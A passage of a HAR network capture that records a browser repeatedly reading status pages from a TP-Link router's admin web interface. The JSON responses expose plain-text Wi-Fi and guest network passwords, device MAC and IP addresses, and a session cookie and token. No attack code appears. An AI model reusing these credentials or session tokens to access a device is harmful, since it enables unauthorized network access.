_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\
\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\
"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n 
\"startedDateTime\": \"2018-07-17T13:10:59.655+03:00\",\r\n \"time\": 1789,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n 
\"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 265,\r\n \"dns\": 251,\r\n \"connect\": 517,\r\n \"send\": 0,\r\n \"wait\": 748,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:09.646+03:00\",\r\n \"time\": 932,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": 
\"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4755,\r\n \"text\": 
\"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wirele
ss_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_
Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":
\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4755\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 637,\r\n \"receive\": 29\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:09.653+03:00\",\r\n \"time\": 1840,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": 
\"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 260,\r\n \"dns\": 251,\r\n \"connect\": 528,\r\n \"send\": 0,\r\n \"wait\": 796,\r\n \"receive\": 5\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:19.646+03:00\",\r\n \"time\": 979,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": 
\"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": 